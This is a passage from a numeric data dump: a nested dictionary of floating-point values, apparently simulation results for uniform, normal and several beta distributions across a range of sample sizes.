0.04701701027264421}, 200: {'uni': 0.0770744511637107, 'nor': 0.1547803767946513, 'beta1': 0.07133133392276658, 'beta2': 0.12003921068285384, 'beta4': 0.05833256338473064}, 150: {'uni': 0.08698214434451997, 'nor': 0.15954648186161546, 'beta1': 0.08183176545570486, 'beta2': 0.12777944293922183, 'beta4': 0.0675035999630012}, 100: {'uni': 0.10375409883656361, 'nor': 0.17061333037285303, 'beta1': 0.10022434196661106, 'beta2': 0.14179923508732106, 'beta4': 0.08374673612833905}, 75: {'uni': 0.11797678653950688, 'nor': 0.18236373219061275, 'beta1': 0.11557026107752538, 'beta2': 0.15377848750968914, 'beta4': 0.09757004251626233}, 50: {'uni': 0.14172731535262179, 'nor': 0.20038698791993043, 'beta1': 0.14046926902337709, 'beta2': 0.1743686159633676, 'beta4': 0.12110025961019322}, 30: {'uni': 0.18039349397749566, 'nor': 0.23067978968795344, 'beta1': 0.18045976448956377, 'beta2': 0.2072893207928338, 'beta4': 0.1592884038412401}, 20: {'uni': 0.21805931381049123, 'nor': 0.2651676956522234, 'beta1': 0.2177278691596758, 'beta2': 0.24147576401840687, 'beta4': 0.19939491723223757}, 10: {'uni': 0.30440975524739855, 'nor': 0.3384425023063676, 'beta1': 0.30324741022916285, 'beta2': 0.3185465132986438, 'beta4': 0.28767747944269173}}, 10: {1000: {'uni': 0.07946518628481158, 'nor': 0.19045003908328084, 'beta1': 0.08877611003813457, 'beta2': 0.1215657503670089, 'beta4': 0.025503535463525406}, 750: {'uni': 0.08130748653818165, 'nor': 0.19076450111902787, 'beta1': 0.0888890045454918, 'beta2': 0.1243044166371681, 'beta4': 0.02964909526636217}, 500: {'uni': 0.0836110010994472, 'nor': 0.19475368394850967, 'beta1': 0.08883318435651434, 'beta2': 0.12587466253680676, 'beta4': 0.03601840756954122}, 400: {'uni': 0.08549487851383872, 'nor': 0.19779586035735008, 'beta1': 0.08896831846511888, 'beta2': 0.12932758634367436, 'beta4': 0.040363816396343344}, 300: {'uni': 0.08877082904027409, 'nor': 0.20230056685424241, 'beta1': 0.0892045849308271, 'beta2': 0.1336762783031652, 'beta4': 0.046694189532298924}, 200: {'uni': 0.09521605691554982, 'nor': 0.20745003836138798, 'beta1': 0.09002076182309414, 'beta2': 0.14011661109027673, 'beta4': 0.057187663505482156}, 150: {'uni': 0.10136020236794296, 'nor': 0.21186943326805385, 'beta1': 0.09104611326846368, 'beta2': 0.1473809348866521, 'beta4': 0.06636195162267067}, 100: {'uni': 0.11533493817169593, 'nor': 0.22268646748177195, 'beta1': 0.10124550813275801, 'beta2': 0.1601077268001888, 'beta4': 0.08126272311296007}, 75: {'uni': 0.1269965695852332, 'nor': 0.23055614273483438, 'beta1': 0.11618044158873528, 'beta2': 0.16938005363200836, 'beta4': 0.09468104187919912}, 50: {'uni': 0.14865284782727461, 'nor': 0.24696834892452627, 'beta1': 0.1404127307767683, 'beta2': 0.18957960935246276, 'beta4': 0.1167721820183078}, 30: {'uni': 0.184923823116925, 'nor': 0.27382056048837045, 'beta1': 0.17891559108637778, 'beta2': 0.22039797844074127, 'beta4': 0.15358516539031264}, 20: {'uni': 0.22119035292803724, 'nor': 0.304517491178646, 'beta1': 0.21765673628337645, 'beta2': 0.2524910203909854, 'beta4': 0.19029690570897123}, 10: {'uni': 0.3023407524707935, 'nor': 0.3728834325973778, 'beta1': 0.3009333240399166, 'beta2': 0.3231264581550173, 'beta4': 0.2754491139259927}}}, 0.3: {1000: {1000: {'uni': 0.030570556366491086, 'nor': 0.036289126652867154, 'beta1': 0.030583281607816093, 'beta2': 0.04730099054512937, 'beta4': 0.027928049313802772}, 750: {'uni': 0.03530316336772765, 'nor': 0.039975128387633396, 'beta1': 0.03548791254752648, 'beta2': 0.04903397020548944, 'beta4': 0.03276890983776548}, 500: {'uni': 0.04335100802104869, 'nor': 0.047243089590878945, 'beta1': 0.04320767542248788, 'beta2': 0.05406062302488723, 'beta4': 0.04082881841396535}, 400: {'uni': 0.048281092293393224, 'nor': 0.05205613503513076, 'beta1': 0.04839219227783753, 'beta2': 0.05736812647420142, 'beta4': 0.04577289803172907}, 300: {'uni': 0.05576437362285486, 'nor': 0.058754859846003094, 'beta1': 0.05561895544923556, 'beta2': 0.06376771212789967, 'beta4': 0.0536396672811823}, 200: {'uni': 0.06807572111096638, 'nor': 0.07039249496628318, 'beta1': 0.06817615907229235, 'beta2': 0.07430836655124429, 'beta4': 0.066284048834367}, 150: {'uni': 0.07830726923539255, 'nor': 0.08091810478755601, 'beta1': 0.07807558772859324, 'beta2': 0.08365151347909958, 'beta4': 0.07647958259852394}, 100: {'uni': 0.09565657848301334, 'nor': 0.0981123740412867, 'beta1': 0.09587885037300997, 'beta2': 0.10003610046247435, 'beta4': 0.09378950313692502}, 75: {'uni': 0.10998073605007008, 'nor': 0.11214689636427033, 'beta1': 0.11019075143205581, 'beta2': 0.11354410085085964, 'beta4': 0.10847644171113585}, 50: {'uni': 0.13428431589627038, 'nor': 0.1352778263583828, 'beta1': 0.1339667315839076, 'beta2': 0.1367603615159646, 'beta4': 0.13324126975406497}, 30: {'uni': 0.17274539443709994, 'nor': 0.17277197187209536, 'beta1': 0.17259686934288682, 'beta2': 0.17455077451940057, 'beta4': 0.17209316662270396}, 20: {'uni': 0.20849017587916696, 'nor': 0.21018909590633755, 'beta1': 0.20978229440378748, 'beta2': 0.210556894106393, 'beta4': 0.20983525727222768}, 10: {'uni': 0.2922169330616662, 'nor': 0.29235515396060796, 'beta1': 0.2914316509769965, 'beta2': 0.29365520324231675, 'beta4': 0.2918719921765267}}, 750: {1000: {'uni': 0.03059448158059208, 'nor': 0.037494550974039864, 'beta1': 0.03057665642636398, 'beta2': 0.04757089622996813, 'beta4': 0.027541558054662435}, 750: {'uni': 0.03510618818786626, 'nor': 0.04119138451985416, 'beta1': 0.03541571187769252, 'beta2': 0.04928902750824704, 'beta4': 0.03230008384262106}, 500: {'uni': 0.0431773659571921, 'nor': 0.048603218782619584, 'beta1': 0.043287997446947, 'beta2': 0.0546730633316056, 'beta4': 0.04048647809949074}, 400: {'uni': 0.04824116558225555, 'nor': 0.05321843834621287, 'beta1': 0.048199305013701704, 'beta2': 0.05800775236698885, 'beta4': 0.04530463746309643}, 300: {'uni': 0.05540518670798833, 'nor': 0.05982198884996326, 'beta1': 0.05567771562072299, 'beta2': 0.06397030785670665, 'beta4': 0.053117582056761314}, 200: {'uni': 0.06772031378900262, 'nor': 0.07116110493731592, 'beta1': 0.06816649733957653, 'beta2': 0.07445014600178901, 'beta4': 0.06569301339546207}, 150: {'uni': 0.07825718715284269, 'nor': 0.08109665950539868, 'beta1': 0.0781046497986293, 'beta2': 0.08456066993421218, 'beta4': 0.0760047555558192}, 100: {'uni': 0.09560224022937375, 'nor': 0.09783638693011121, 'beta1': 0.09584895290202361, 'beta2': 0.10104976356957773, 'beta4': 0.0933672980698591}, 75: {'uni': 0.11025701077751521, 'nor': 0.11241322058286463, 'beta1': 0.11027559531133363, 'beta2': 0.1146920311954221, 'beta4': 0.10829053112713038}, 50: {'uni': 0.1348035578662452, 'nor': 0.13548682039682758, 'beta1': 0.13551492026149686, 'beta2': 0.13742355171140241, 'beta4': 0.13319685684134053}, 30: {'uni': 0.17183186657209226, 'nor': 0.17337212860618245, 'beta1': 0.17194526495477658, 'beta2': 0.17514496328394213, 'beta4': 0.17170411964854926}, 20: {'uni': 0.20996377678372924, 'nor': 0.21037655192180804, 'beta1': 0.2091953390508008, 'beta2': 0.21268253320487945, 'beta4': 0.20887454279336315}, 10: {'uni': 0.2925813013469445, 'nor': 0.2934970209180323, 'beta1': 0.2903843227554898, 'beta2': 0.292154024055348, 'beta4': 0.29025052699691306}}, 500: {1000: {'uni': 0.030652753404500244, 'nor': 0.04025690717821617, 'beta1': 0.030458725319031765, 'beta2': 0.049452523707565255, 'beta4': 0.026981460357740128}, 750: {'uni': 0.035255881858022864, 'nor': 0.04408262087996018, 'beta1': 0.03533505950722848, 'beta2': 0.05114773735578226, 'beta4': 0.031654754917049166}, 500: {'uni': 0.04332946212438382, 'nor': 0.050711888523930104, 'beta1': 0.043188647812777536, 'beta2': 0.056694190819294554, 'beta4': 0.03937922946595157}, 400: {'uni': 0.048011092268698596, 'nor': 0.055004776506215936, 'beta1': 0.04817813554171174, 'beta2': 0.06059305610807844, 'beta4': 0.04451593078130045}, 300: {'uni': 0.05595247678173959, 'nor': 0.06136644245697265, 'beta1': 0.05542281776135362, 'beta2': 0.06619403671726683, 'beta4': 0.05220515153028432}, 200: {'uni': 0.06793933725045043, 'nor': 0.072898052813477, 'beta1': 0.067644332252282, 'beta2': 0.07738699602692958, 'beta4': 0.06489369991242622}, 150: {'uni': 0.07828090175002178, 'nor': 0.08301359537151642, 'beta1': 0.07815202804646415, 'beta2': 0.08680541880550621, 'beta4': 0.07563081329347063}, 100: {'uni': 0.09519553412075393, 'nor': 0.09944204457595673, 'beta1': 0.09607238042455157, 'beta2': 0.10213640052628101, 'beta4': 0.09308677814519356}, 75: {'uni': 0.10987316808535197, 'nor': 0.11376703529598509, 'beta1': 0.11023390350368756, 'beta2': 0.11604916566241219, 'beta4': 0.10758493316270056}, 50: {'uni': 0.13478443657887695, 'nor': 0.13740298760950306, 'beta1': 0.13406829393670033, 'beta2': 0.13903979048229387, 'beta4': 0.13262398989576224}, 30: {'uni': 0.17197956239052636, 'nor': 0.17432046908514903, 'beta1': 0.17182749783377138, 'beta2': 0.1754950827809304, 'beta4': 0.17133978839693642}, 20: {'uni': 0.2092323475175519, 'nor': 0.2121086324057767, 'beta1': 0.20789680345483424, 'beta2': 0.21277241600873145, 'beta4': 0.20863390282366368}, 10: {'uni': 0.2917818325981677, 'nor': 0.29390261172986865, 'beta1': 0.29469106553609536, 'beta2': 0.2925795869784428, 'beta4': 0.29103683472752606}}, 400: {1000: {'uni': 0.030479441749132086, 'nor': 0.04242546169128053, 'beta1': 0.030684562640612367, 'beta2': 0.04928918568341689, 'beta4': 0.026564469238728072}, 750: {'uni': 0.035330745692963184, 'nor': 0.045726585835036526, 'beta1': 0.035249379001672465, 'beta2': 0.051449055827561985, 'beta4': 0.031085761627238417}, 500: {'uni': 0.04298425565078945, 'nor': 0.05219112197292464, 'beta1': 0.04291699141997607, 'beta2': 0.05671446941827829, 'beta4': 0.03879788587172339}, 400: {'uni': 0.04841156712913064, 'nor': 0.0567067838815154, 'beta1': 0.04826292059676973, 'beta2': 0.06080155637236173, 'beta4': 0.04387502981511732}, 300: {'uni': 0.05551848242038693, 'nor': 0.06314336913027119, 'beta1': 0.055995408019056725, 'beta2': 0.06670707901265915, 'beta4': 0.05161729197545491}, 200: {'uni': 0.06753280207209278, 'nor': 0.07418549342747993, 'beta1': 0.06780632083464455, 'beta2': 0.07849742855872144, 'beta4': 0.06417277685422138}, 150: {'uni': 0.07892131000767688, 'nor': 0.08428480798230137, 'beta1': 0.07802952658645362, 'beta2': 0.08721266316087362, 'beta4': 0.07509578556966912}, 100: {'uni': 0.09561040817701183, 'nor': 0.10046283966596203, 'beta1': 0.09553795639618262, 'beta2': 0.10295978967769193, 'beta4': 0.09309270468588221}, 75: {'uni': 0.10996879959002176, 'nor': 0.11403749710690919, 'beta1': 0.10970089630785607, 'beta2': 0.11687400266180792, 'beta4': 0.10767273652342291}, 50: {'uni': 0.1341573935423448, 'nor': 0.13750721156433715, 'beta1': 0.13357309262133255, 'beta2': 0.139422581194317, 'beta4': 0.13196955935935817}, 30: {'uni': 0.1719839698851492, 'nor': 0.17517615589326285, 'beta1': 0.171936226302963, 'beta2': 0.1757297703717665, 'beta4': 0.17054913647066844}, 20: {'uni': 0.20962568415417043, 'nor': 0.21093017482022178, 'beta1': 0.2109531327417335, 'beta2': 0.2124421410702677, 'beta4': 0.20866942953199907}, 10: {'uni': 0.2915846887153032, 'nor': 0.29318333013550635, 'beta1': 0.29230277183835673, 'beta2': 0.2935460494777875, 'beta4': 0.28943585016669493}}, 300: {1000: {'uni': 0.03073870905118381, 'nor': 0.0453721867186922, 'beta1': 0.030539757310093174, 'beta2': 0.051014128266916536, 'beta4': 0.02630816348221443}, 750: {'uni': 0.03527707956428239, 'nor': 0.04863496689192515, 'beta1': 0.03535272337640838, 'beta2': 0.05309247098188674, 'beta4': 0.030847740239343002}, 500: {'uni': 0.043103093119915115, 'nor': 0.05537548898945838, 'beta1': 0.043192985581247845, 'beta2': 0.05832301347306265, 'beta4': 0.03827598384084602}, 400: {'uni': 0.048262357386229554, 'nor': 0.05896990305419164, 'beta1': 0.048041282307002886, 'beta2': 0.06273926833030019, 'beta4': 0.04347619692280544}, 300: {'uni': 0.05560700720185019, 'nor': 0.06551918373036114, 'beta1': 0.05595087210581695, 'beta2': 0.07079250726314845, 'beta4': 0.050855969461618744}, 200: {'uni': 0.06812841845448789, 'nor': 0.07631719062877812, 'beta1': 0.06791089524731492, 'beta2': 0.08017905748846188, 'beta4': 0.0633369247159101}, 150: {'uni': 0.07810976084211943, 'nor': 0.08571298221651569, 'beta1': 0.07824014285292191, 'beta2': 0.08865175294154615, 'beta4': 0.07411587643546858}, 100: {'uni': 0.09592845950854673, 'nor': 0.10235667303102258, 'beta1': 0.09560853089329824, 'beta2': 0.10410221530439875, 'beta4': 0.09145854216968004}, 75: {'uni': 0.11015610349253213, 'nor': 0.1161051824359548, 'beta1': 0.10967509979155243, 'beta2': 0.11812739483956008, 'beta4': 0.10661075747218696}, 50: {'uni': 0.13390288180005772, 'nor': 0.13883954661488274, 'beta1': 0.13467234949737394, 'beta2': 0.14042225887719018, 'beta4': 0.13136625179037467}, 30: {'uni': 0.1724189791803339, 'nor': 0.17610514891945817, 'beta1': 0.1721264669585005, 'beta2': 0.17732195199566786, 'beta4': 0.16928963468833258}, 20: {'uni': 0.20941682201461762, 'nor': 0.21215745594224503, 'beta1': 0.209618043392665, 'beta2': 0.21371395755354405, 'beta4': 0.20720457780049284}, 10: {'uni': 0.29136573039108826, 'nor': 0.2953533906937393, 'beta1': 0.2915141637355504, 'beta2': 0.2947095663135966, 'beta4': 0.289661443618565}}, 200: {1000: {'uni': 0.03064984686392691, 'nor': 0.05043451860288389, 'beta1': 0.03064869204617815, 'beta2': 0.05363856162776437, 'beta4': 0.025837623182089042}, 750: {'uni': 0.035114470743031645, 'nor': 0.053636498003354405, 'beta1': 0.03554354970773452, 'beta2': 0.05641494858720919, 'beta4': 0.030228871955573333}, 500: {'uni': 0.04344683479356848, 'nor': 0.05942737801622866, 'beta1': 0.043048920849664496, 'beta2': 0.06112458005245336, 'beta4': 0.037499090398733725}, 400: {'uni': 0.04819713799051478, 'nor': 0.06309225457944956, 'beta1': 0.04838699880676922, 'beta2': 0.06781833446638641, 'beta4': 0.0425087448681592}, 300: {'uni': 0.05572898393078207, 'nor': 0.06952530258059553, 'beta1': 0.05570841382179792, 'beta2': 0.07285768572268875, 'beta4': 0.049575966762646265}, 200: {'uni': 0.06807383659418853, 'nor': 0.0801618017819507, 'beta1': 0.06801333859302938, 'beta2': 0.08234805993218725, 'beta4': 0.062140022551191165}, 150: {'uni': 0.07824711164133136, 'nor': 0.08923127184269253, 'beta1': 0.07883741776826814, 'beta2': 0.09251067651440004, 'beta4': 0.07291587380406012}, 100: {'uni': 0.09560431314077711, 'nor': 0.10450815715126349, 'beta1': 0.09567404787638834, 'beta2': 0.10773887846339109, 'beta4': 0.0902075650584725}, 75: {'uni': 0.10977650182622334, 'nor': 0.11816618106678134, 'beta1': 0.1102669991197075, 'beta2': 0.12049187221799695, 'beta4': 0.1048324984984148}, 50: {'uni': 0.1343039124732452, 'nor': 0.14086250431567415, 'beta1': 0.13455177937493012, 'beta2': 0.14203349915576058, 'beta4': 0.1302572093652935}, 30: {'uni': 0.1724479563898607, 'nor': 0.1782054960600049, 'beta1': 0.1720655432067857, 'beta2': 0.1780270710205825, 'beta4': 0.16818233155276918}, 20: {'uni': 0.2093785331688025, 'nor': 0.2140572740180554, 'beta1': 0.21029145111991537, 'beta2': 0.21456930963381293, 'beta4': 0.20682532198274484}, 10: {'uni': 0.29202855251861926, 'nor': 0.2954659784755673, 'beta1': 0.292463352998359, 'beta2': 0.2955290443845223, 'beta4': 0.2887217045817}}, 150: {1000: {'uni': 0.030838216779515926, 'nor': 0.055018265206959294, 'beta1': 0.030517843339180506, 'beta2': 0.05608372418016283, 'beta4': 0.025431929019819777}, 750: {'uni': 0.035362123917898614, 'nor': 0.058457030173542646, 'beta1': 0.03537517904333426, 'beta2': 0.058769180918217145, 'beta4': 0.029837989943044763}, 500: {'uni': 0.043213922318430464, 'nor': 0.06424368163594418, 'beta1': 0.04316681258670646, 'beta2': 0.06710587272080526, 'beta4': 0.03703364619373262}, 400: {'uni': 0.04833376337863218, 'nor': 0.06756792606856232, 'beta1': 0.04799783573268496, 'beta2': 0.07039870056739572, 'beta4': 0.041724718744219014}, 300: {'uni': 0.05586146681024584, 'nor': 0.07329310314756038, 'beta1': 0.05529638444154705, 'beta2': 0.07558336097154274, 'beta4': 0.04886164431709525}, 200: {'uni': 0.06794570035955794, 'nor': 0.08378073139649633, 'beta1': 0.06823928564341947, 'beta2': 0.0860472972006906, 'beta4': 0.06117936529617951}, 150: {'uni': 0.07839758781878625, 'nor': 0.09231986974590034, 'beta1': 0.07844421422032721, 'beta2': 0.09371209848751239, 'beta4': 0.07131228351352475}, 100: {'uni': 0.09586975657519081, 'nor': 0.10714675207140412, 'beta1': 0.09559347574817811, 'beta2': 0.11002902848994539, 'beta4': 0.08959146899533599}, 75: {'uni': 0.11010826171433234, 'nor': 0.12126074477384846, 'beta1': 0.10990930848644964, 'beta2': 0.12178803610217631, 'beta4': 0.10380949345486348}, 50: {'uni': 0.1343214298555367, 'nor': 0.14247203802994213, 'beta1': 0.13385227759189416, 'beta2': 0.14299792348234408, 'beta4': 0.12836902924407073}, 30: {'uni': 0.1725778251785654, 'nor': 0.17826765858321283, 'beta1': 0.17232850345099437, 'beta2': 0.17902665877961377, 'beta4': 0.16804486300951366}, 20: {'uni': 0.20923828034878794, 'nor': 0.21505427759471324, 'beta1': 0.20947316437016195, 'beta2': 0.21556344537944894, 'beta4': 0.205296822907456}, 10: {'uni': 0.2912969465283485, 'nor': 0.29786616175121944, 'beta1': 0.2921180556905318, 'beta2': 0.2942536240063773, 'beta4': 0.28867921289925763}}, 100: {1000: {'uni': 0.031072383442646623, 'nor': 0.06286992752019249, 'beta1': 0.030625891912101244, 'beta2': 0.05879416691552142, 'beta4': 0.025203295860677627}, 750: {'uni': 0.03580272688057862, 'nor': 0.06614015652523586, 'beta1': 0.035330967643673494, 'beta2': 0.06164117508809697, 'beta4': 0.029546455172328512}, 500: {'uni': 0.04347491725851127, 'nor': 0.07103887819755894, 'beta1': 0.04288278858954275, 'beta2': 0.06950563628146106, 'beta4': 0.036250627429170346}, 400: {'uni': 0.04841725320908952, 'nor': 0.07515276106744045, 'beta1': 0.048207874825495156, 'beta2': 0.07281441955053547, 'beta4': 0.04106938703316515}, 300: {'uni': 0.05581361792803008, 'nor': 0.0804344767904921, 'beta1': 0.05549497359097222, 'beta2': 0.07860014494562395, 'beta4': 0.04816835176472789}, 200: {'uni': 0.0680104028224871, 'nor': 0.0899287719835754, 'beta1': 0.06768158716081898, 'beta2': 0.08861735552692984, 'beta4': 0.059838070085047684}, 150: {'uni': 0.07830299427203302, 'nor': 0.09823952555336729, 'beta1': 0.0781938574456082, 'beta2': 0.09864482170689659, 'beta4': 0.07000041446264826}, 100: {'uni': 0.09572762933073209, 'nor': 0.11370380350455811, 'beta1': 0.09588982413073177, 'beta2': 0.11254326539068987, 'beta4': 0.0872727084042092}, 75: {'uni': 0.10972174136249069, 'nor': 0.1261032950814237, 'beta1': 0.10998724073974103, 'beta2': 0.1250175630115139, 'beta4': 0.10149116692916582}, 50: {'uni': 0.1346226891470239, 'nor': 0.1474470477708189, 'beta1': 0.13398284073629363, 'beta2': 0.14605045540182798, 'beta4': 0.12656776186643182}, 30: {'uni': 0.171289729627625, 'nor': 0.18300803860826304, 'beta1': 0.17197133058640537, 'beta2': 0.18045847672308146, 'beta4': 0.16615899142928847}, 20: {'uni': 0.20948265436898134, 'nor': 0.21820996754149108, 'beta1': 0.2083154616981402, 'beta2': 0.21682018217589444, 'beta4': 0.20368889712319002}, 10: {'uni': 0.29332092603556315, 'nor': 0.29884771959554113, 'beta1': 0.2928639451085291, 'beta2': 0.29596957653109623, 'beta4': 0.287993475210005}}, 75: {1000: {'uni': 0.03154718546267052, 'nor': 0.07044763487600164, 'beta1': 0.030523906995489347, 'beta2': 0.06095775037531781, 'beta4': 0.025178612703061598}, 750: {'uni': 0.03587641128641306, 'nor': 0.07299193497447859, 'beta1': 0.035281289240443936, 'beta2': 0.06385369106198494, 'beta4': 0.029127736955950057}, 500: {'uni': 0.04391766277410497, 'nor': 0.07813329575242478, 'beta1': 0.04340596642353545, 'beta2': 0.07179729219122671, 'beta4': 0.036086430090033816}, 400: {'uni': 0.048844097708170386, 'nor': 0.08183669421171236, 'beta1': 0.04807797399750002, 'beta2': 0.07521514498858767, 'beta4': 0.04049563308356163}, 300: {'uni': 0.0559940480059955, 'nor': 0.08609350845523445, 'beta1': 0.055831745197134575, 'beta2': 0.0826010220686782, 'beta4': 0.04713573528154402}, 200: {'uni': 0.0683453076733273, 'nor': 0.09540815213423537, 'beta1': 0.06790338184860889, 'beta2': 0.09158709481883592, 'beta4': 0.059111816398762285}, 150: {'uni': 0.07844185085801125, 'nor': 0.10391542371009366, 'beta1': 0.07831073142916842, 'beta2': 0.10032168899848526, 'beta4': 0.06888011570999455}, 100: {'uni': 0.09594855642525024, 'nor': 0.11746142695193407, 'beta1': 0.09516113565651263, 'beta2': 0.11488209132926885, 'beta4': 0.08612950477373915}, 75: {'uni': 0.10978056964178606, 'nor': 0.13039658706335377, 'beta1': 0.11037351197141043, 'beta2': 0.12760478930659974, 'beta4': 0.10050946376158554}, 50: {'uni': 0.1342077394648763, 'nor': 0.15134188483531175, 'beta1': 0.13361807973321893, 'beta2': 0.14895024123184664, 'beta4': 0.1248108548205345}, 30: {'uni': 0.17154364522069487, 'nor': 0.18473249458088753, 'beta1': 0.17248033985600267, 'beta2': 0.18331185817811452, 'beta4': 0.16423432417184547}, 20: {'uni': 0.20782941225027318, 'nor': 0.22146906910281994, 'beta1': 0.209751594461421, 'beta2': 0.2173162603888529, 'beta4': 0.20159255474557342}, 10: {'uni': 0.291334076187922, 'nor': 0.2992867706784435, 'beta1': 0.29261596744170054, 'beta2': 0.2960163189286691, 'beta4': 0.28524371036426077}}, 50: {1000: {'uni': 0.0329993154562257, 'nor': 0.08207318747113157, 'beta1': 0.030671468325690204, 'beta2': 0.06648424648000095, 'beta4': 0.02488381017609015}, 750: {'uni': 0.03738443452448176, 'nor': 0.08572544936677795, 'beta1': 0.035303282232089284, 'beta2': 0.07002036286325686, 'beta4': 0.028894147053289826}, 500: {'uni': 0.044737763029671695, 'nor': 0.08966708732648676, 'beta1': 0.04340465898409554, 'beta2': 0.07682945882872405, 'beta4': 0.03548424878981277}, 400: {'uni': 0.04937088906781539, 'nor': 0.09281018247408995, 'beta1': 0.04840075745360373, 'beta2': 0.07992875043033376, 'beta4': 0.03972236374485255}, 300: {'uni': 0.056674883766536566, 'nor': 0.09773596053700151, 'beta1': 0.05549753161205717, 'beta2': 0.08714041454214849, 'beta4': 0.04659758746289444}, 200: {'uni': 0.06860153239416655, 'nor': 0.10630954521453767, 'beta1': 0.06793537494136576, 'beta2': 0.09641941459565317, 'beta4': 0.05784887912329589}, 150: {'uni': 0.0787453526380626, 'nor': 0.11324399916126676, 'beta1': 0.07869495808729748, 'beta2': 0.10493442734242159, 'beta4': 0.06755025538156267}, 100: {'uni': 0.09522502884464878, 'nor': 0.12666649348936998, 'beta1': 0.0955330448453976, 'beta2': 0.11990014749723277, 'beta4': 0.08427352133834594}, 75: {'uni': 0.1100197062263768, 'nor': 0.13833028774850076, 'beta1': 0.10986631872332808, 'beta2': 0.13176370778245594, 'beta4': 0.09870160730848387}, 50: {'uni': 0.13421155841951937, 'nor': 0.15941967086434394, 'beta1': 0.1339691684883051, 'beta2': 0.15279416514019803, 'beta4': 0.12213609394490166}, 30: {'uni': 0.1721102987741357, 'nor': 0.19290136415164644, 'beta1': 0.1729701132110737, 'beta2': 0.18618368178105146, 'beta4': 0.16098989092313043}, 20: {'uni': 0.20807791188346714, 'nor': 0.2270631379617466, 'beta1': 0.20884121198766303, 'beta2': 0.22035377475051882, 'beta4': 0.1999515315854391}, 10: {'uni': 0.28942960019437525, 'nor': 0.30528957184252636, 'beta1': 0.29033509284968895, 'beta2': 0.3002914665011813, 'beta4': 0.2840920174861028}}, 30: {1000: {'uni': 0.03740912638303681, 'nor': 0.1036739698595659, 'beta1': 0.03212037925335687, 'beta2': 0.07451381449879518, 'beta4': 0.024765179813423077}, 750: {'uni': 0.04113538401988681, 'nor': 0.10564716613623504, 'beta1': 0.03524754243631689, 'beta2': 0.07840817147245094, 'beta4': 0.028582301342003846}, 500: {'uni': 0.04768205798272118, 'nor': 0.10893592471801378, 'beta1': 0.043098984557192854, 'beta2': 0.08429395075959556, 'beta4': 0.035281334521673924}, 400: {'uni': 0.052145846598435464, 'nor': 0.11218348141224654, 'beta1': 0.048316311309606494, 'beta2': 0.08737730595826376, 'beta4': 0.03951837119677115}, 300: {'uni': 0.058719416850484873, 'nor': 0.11635156663185392, 'beta1': 0.05539882042196062, 'beta2': 0.09410523757141842, 'beta4': 0.04574881189356261}, 200: {'uni': 0.07049814833509804, 'nor': 0.12466200180191964, 'beta1': 0.06800412320163807, 'beta2': 0.10367008819351042, 'beta4': 0.05653287408590357}, 150: {'uni': 0.07998404492207556, 'nor': 0.13156596855270042, 'beta1': 0.07831590231210439, 'beta2': 0.11171068575197618, 'beta4': 0.0660458608943065}, 100: {'uni': 0.09736733051622676, 'nor': 0.14383411909324195, 'beta1': 0.09527581350107495, 'beta2': 0.1266963468351454, 'beta4': 0.08165556587689915}, 75: {'uni': 0.11099146175383867, 'nor': 0.15454031497016313, 'beta1': 0.11017526259797866, 'beta2': 0.13795208288587246, 'beta4': 0.09575531965915296}, 50: {'uni': 0.13538536757080866, 'nor': 0.17221057810453794, 'beta1': 0.1338257169878449, 'beta2': 0.15804741489707852, 'beta4': 0.11922046414258292}, 30: {'uni': 0.1712608697310144, 'nor': 0.205400562436021, 'beta1': 0.17222575085713476, 'beta2': 0.19119060032529278, 'beta4': 0.1565519610771569}, 20: {'uni': 0.2068845576782115, 'nor': 0.23594894671277633, 'beta1': 0.20857821881607397, 'beta2': 0.2242706036141524, 'beta4': 0.1940900991677027}, 10: {'uni': 0.29081139802402245, 'nor': 0.31265691993665123, 'beta1': 0.29235607151474635, 'beta2': 0.3015701463278587, 'beta4': 0.2789156239002969}}, 20: {1000: {'uni': 0.04642868998031713, 'nor': 0.12332330472504827, 'beta1': 0.04718089852596563, 'beta2': 0.08438078560427192, 'beta4': 0.02457559775898424}, 750: {'uni': 0.04842165313054653, 'nor': 0.12556727406528229, 'beta1': 0.04738271045571918, 'beta2': 0.08834690715792337, 'beta4': 0.028340709811087494}, 500: {'uni': 0.053533279505937725, 'nor': 0.12887684121155335, 'beta1': 0.0479593523582066, 'beta2': 0.093134206549116, 'beta4': 0.034852424538950655}, 400: {'uni': 0.056828739022670716, 'nor': 0.13151540254532723, 'beta1': 0.04877580382157087, 'beta2': 0.09653221115404376, 'beta4': 0.03906534512633897}, 300: {'uni': 0.06308823466796709, 'nor': 0.13632125697142994, 'beta1': 0.0557557473436297, 'beta2': 0.10253109087801837, 'beta4': 0.04531815758557228}, 200: {'uni': 0.07360180211640582, 'nor': 0.1432942311893014, 'beta1': 0.0681727970568623, 'beta2': 0.11121417118399335, 'beta4': 0.05595760960414742}, 150: {'uni': 0.08288729795659577, 'nor': 0.15043917273012375, 'beta1': 0.0783065570550272, 'beta2': 0.11935424277145812, 'beta4': 0.06470942284344405}, 100: {'uni': 0.09859178235766261, 'nor': 0.16124156030703884, 'beta1': 0.0958462390352337, 'beta2': 0.13264339398473482, 'beta4': 0.08038263656370306}, 75: {'uni': 0.11264602897630796, 'nor': 0.17162756566496928, 'beta1': 0.1093583226332463, 'beta2': 0.1449055731559286, 'beta4': 0.0936741537870105}, 50: {'uni': 0.1351538849647479, 'nor': 0.1891059788104762, 'beta1': 0.13353828395816583, 'beta2': 0.16446554293023208, 'beta4': 0.11692137693757179}, 30: {'uni': 0.17267793406617293, 'nor': 0.2194410481865578, 'beta1': 0.1715183906280785, 'beta2': 0.19549280548078546, 'beta4': 0.15280157061971122}, 20: {'uni': 0.2080554278862089, 'nor': 0.2504069566387129, 'beta1': 0.20849205040193286, 'beta2': 0.22837347924333673, 'beta4': 0.1902516928790116}, 10: {'uni': 0.2889268854801783, 'nor': 0.32163657747008745, 'beta1': 0.29149738853371904, 'beta2': 0.30355224871981534, 'beta4': 0.27571078427238804}}, 10: {1000: {'uni': 0.07592862842758177, 'nor': 0.17675731917954068, 'beta1': 0.0877969299631155, 'beta2': 0.11144784434222144, 'beta4': 0.02460170484284585}, 750: {'uni': 0.07759279278991063, 'nor': 0.1772870041660417, 'beta1': 0.0879620025181791, 'beta2': 0.11460621564738957, 'beta4': 0.02832708685480334}, 500: {'uni': 0.08065845775127545, 'nor': 0.17989701264902008, 'beta1': 0.08783750916584376, 'beta2': 0.11712110163722245, 'beta4': 0.03467098270876123}, 400: {'uni': 0.08256541536026196, 'nor': 0.18417802004566128, 'beta1': 0.08790601108528329, 'beta2': 0.12019289656717527, 'beta4': 0.03891946560744147}, 300: {'uni': 0.08559905562808945, 'nor': 0.18462701647872692, 'beta1': 0.08826474685236314, 'beta2': 0.12439317845494924, 'beta4': 0.044963765983094595}, 200: {'uni': 